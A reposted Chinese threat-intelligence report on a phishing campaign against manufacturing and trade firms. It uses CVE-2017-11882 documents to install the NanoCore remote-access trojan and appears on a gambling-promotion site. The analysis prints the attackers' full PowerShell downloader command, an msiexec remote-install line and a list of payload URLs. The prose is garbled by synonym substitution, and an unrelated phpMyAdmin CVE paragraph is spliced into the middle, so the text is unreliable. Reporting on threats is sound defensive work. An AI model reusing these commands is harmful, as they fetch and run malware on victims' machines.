黑客应用“商贸信”邮件群发进击千家企业,广东为重灾区 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

黑客应用“商贸信”邮件群发进击千家企业,广东为重灾区

申博_新闻事件 申博 167次浏览 已收录 0个评论

一、背景

腾讯平安御见要挟情报中心检测到“商贸信”垂纶邮件进击在9月涌现新一轮增进。在此次进击中,黑客经心组织的带有office公式编辑器破绽CVE-2017-11882或宏代码的歹意文档,将其作为附件批量发送至外贸行业企业邮箱中,在其翻开文档中招后植入远控木马NanoCore举行秘要信息盗取和长途掌握,本次进击岑岭时代天天胜利投递超3000个邮件地点。

经由历程溯源剖析,我们发明黑客疑似运用一款名为“****邮件群发器”的软件举行邮箱地点收集和邮件批量投递。据测算,该软件具有5000个/小时的邮箱地点收集才能,并且在发件时能够自动替换代办IP,已被黑客应用于针对对外贸企业的“自动化”进击。部份受进击企业以下:

 

依据腾讯平安御见要挟情报中心统计数据,有凌驾1000家企业遭到此次进击影响,个中近一半以上散布在广东、江苏、浙江和上海四地,个中广东占比凌驾30%。特别是广东深圳和东莞因为制作业和外贸行业麋集,成为本次进击受益最严峻的地区。

从行业散布来看,“商贸信”进击目的主要集合在产业制作及商业行业。统计数据显现,被进击的88%为制作业,盈余12%是与制作业供给相干联的贩卖、运输、商务服务行业。

二、进击源

垂纶邮件主要经由历程捏造以下发件邮箱举行发送,个中运用最多的为

以个中一封邮件为例,从邮件头部信息中能够看到发件工资“Keith Ward/SDG /UK”,发件邮箱地点为[email protected]。sdgtrading是一家总部位于英国的进出口商业公司,现在翻开该公司官方网站能够一般接见。

翻开网站的contact-us页面我们发明有一个职务为UK & European Sales(英国及欧洲地区贩卖)的职员联系体式格局为[email protected],而这恰是垂纶邮件发件邮箱(有两个字母位置交流)。我们推想进击者能够经由历程爬取或许人工汇集的体式格局获取了该商业公司的邮件地点,然后伪装成该公司的贩卖职员发送垂纶邮件举行进击。

黑客应用“商贸信”邮件群发进击千家企业,广东为重灾区

商业公司贩卖职员信息

三、样本剖析

垂纶邮件

邮件内容是关于商业定单确认和价钱征询。邮件表述中高频涌现涌现以下文句:

“订购”、“价钱”、“价目表”、“贩卖前提”、“折扣”、“装运日期”、“采购规格”等。

邮件中还指出邮件附件中包括“想要采购的产物条目”文档,请浏览后举行复兴,部份文档名以下:

· RFQ0591403-SDG.doc

· RFQ015770082.doc

剖析发明,附件文档中包括Office公式编辑器破绽CVE-2017-11882应用代码或歹意宏代码,经由破绽进击或宏代码实行历程,会触发用于下载木马的Powershell敕令实行,进一步下载木马:

'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'

除了应用Powershell,另有部份进击中运用Windows装置顺序(msiexec.exe)装置MSI包文件举行木马下载:

msiEXEc  /i http[:]//oppofile.duckdns.org/d/dar.msi

从现在捕获到的进击文档中我们发明有以下木马下载地点:

hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi
hxxp://oppofile.duckdns.org/e/gmb.msi

远控木马

被下载植入的实际上是的经由殽杂的远控木马NanoCore,NanoCore是运用.Net言语编写的功用强大的长途接见掌握木马(RAT),能够在目的主机上举行文件操纵,屏幕掌握,运转指定顺序,还支撑插件扩大功用,被感染NanoCore木马的电脑会涌现严峻信息泄漏,进击者还能够应用中毒电脑为跳板,对目的收集继续举行渗入入侵。

中心模块被加密后以位图花样保存在资本文件

“tewo3zFRzUGateK2dRRrbMo6Wdh7BawEbNw3whpXsTZfWwZYJ5X2aQTf2rHJrHGpTdCgwV16xL12y4YmEZj1nol5xVq6OWJTNPKhhTT3tBIWOAi7IjgznVXv3N2fC3b2wvrYdjp6hvBPP0bLGemkdbuwNcxmAjipQGmsISXkujt”中

CVE-2019-12922:phpMyAdmin 0 Day漏洞

安全研究人员Manuel Garcia Cardenas近日公布了最常用的管理MySQL和MariaDB数据库的应用程序phpMyAdmin中的0 day漏洞细节和PoC。 phpMyAdmin是一个用PHP编写的免费软件工具,也是用于处理MySQL或MariaDB数据库服务器的开源管理工具。phpMyAdmin被广泛用于管理用WordPress, Joomla等内容管理平台的网站的数据库。 安全研究人员称该漏洞实际上是一个CSRF漏洞,也叫做XSRF漏洞。即攻击者可以诱使认证的用户来执行恶意行为。 该漏洞CVE编号为CVE-2019-12922

黑客应用“商贸信”邮件群发进击千家企业,广东为重灾区

从资本中获取到数据后,经由屡次解密取得终究的PE文件,然后将其Load到内存,并跳转到进口位置实行。

终究实行的NanoCore RAT功用强大,可实行种种歹意操纵,如文件操纵,注册表编辑,历程掌握,文件传输,长途敕令实行,键盘纪录等。以下为该木马掌握端界面:

四、溯源剖析

群发软件

我们将捕获到的一个发件IP地点175.***.***.134输入到腾讯安图高等要挟溯源体系查询,经由历程排查,发明了一个名为“***\邮件群发器.exe”的可疑顺序,该顺序在近期接见了发件IP地点。

运用该可疑文件名中的“***邮件群发器”关键字举行搜刮,发明了这款名为****的邮件群发器软件。该软件具有从收集上批量爬取邮箱地点,并针对取得的邮箱举行批量发送指定邮件的功用。

黑客应用“商贸信”邮件群发进击千家企业,广东为重灾区

我们下载该软件,并举行注册和试用。依据其界面展现的功用,只需编写好邮件内容(恣意填写发件人姓名)、批量增加收件人地点、点击“最先群发”三步,即可将邮件疾速发送至多量的目的邮箱中。

该软件还支撑检察群发效果,如果有发送失利的状况,能够一键重发。发送时还能够挑选自动替换代办IP,这在肯定程度上能够隐蔽实在发件IP。

该软件另有一个主要的功用是,支撑从指定网站收集目的邮箱。该功用页面默许的源网站地点为http[:]//www.****.biz/。我们尝试运用该网站举行邮箱收集,在10分钟以内能够收集到近800个邮箱地点,换算后一个小时以内能够收集到5000个邮箱,而这些被收集到的邮箱都存在被进击的能够。

黑客应用“商贸信”邮件群发进击千家企业,广东为重灾区

能够看到这个默许的邮箱收集网站“**网”(www.*****.biz)是一个商业信息宣布平台,大批厂商(机器、化工、电气、动力、仪器等行业)在该网站上宣布等各种产物的供给或求购信息。而每一条信息都邑附带厂商的电话、邮编、邮箱等联系体式格局,“****邮件群发器”恰是从这些信息中获取了大批的邮箱地点。

进击思绪

从以下几个角度,我们以为黑客运用了邮件群发软件“****邮件群发器”举行辅佐进击:

1、 群发软件“****”有近期接见发件人IP的纪录;

2、 受益企业范例与“****邮件群发器”默许收集邮箱范例一致(产业品商业公司);

3、 进击的影响局限与该软件的收集才能符合(受益邮箱约3000个/日 & 软件的收集才能约5000个/小时)。

推想黑客实行进击的思绪以下:

1、 黑客下载邮件群发软件;

2、 组织带有CVE-2017-11882破绽应用(或许宏代码)的office歹意文件;

3、 运用****邮件群发器从商业分类信息网站批量收集目的邮箱地点;

4、 运用准备好的歹意文档作为附件,组织垂纶邮件并批量发送;

5、 守候收件人翻开附件并中招,经由历程远控木马NanoCore对目的举行长途掌握。

黑客应用“商贸信”邮件群发进击千家企业,广东为重灾区

五、总结

在此次进击事宜中能够发明,黑客与灰产从业职员涌现了交集。灰产职员开发出邮件群发东西,东西可针对网站上的公然邮箱举行爬取,可应用获取到的邮箱举行批量群发邮件。东西在其注册的“官网”上举行公然售卖,运用说明中“公理”地提到“仅用于正规邮件营销,滥用者后果自负”。但东西一旦售出,便难以保证被用于正当用处。

而黑客取得此软件后,将其归入进击兵器中的一员。随后,只需编写好木马,组织垂纶邮件,就能够应用该东西将垂纶邮件自动化、多量量地发送至企业的相干邮箱中。

六、平安发起

1、 企业邮箱网管将以下发件邮箱设置为黑名单

2、不要翻开不明泉源的邮件附件,关于附件中的文件要郑重运转,如发明有剧本或其他可实行文件可先运用杀毒软件举行扫描;

3、晋级office系列软件到最新版本,实时修复office顺序破绽,不要随便运转不可信文档中的宏;

4、引荐布置平安治理体系防备病毒木马进击;

原文地点: https://www.4hou.com/system/20450.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明黑客应用“商贸信”邮件群发进击千家企业,广东为重灾区
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址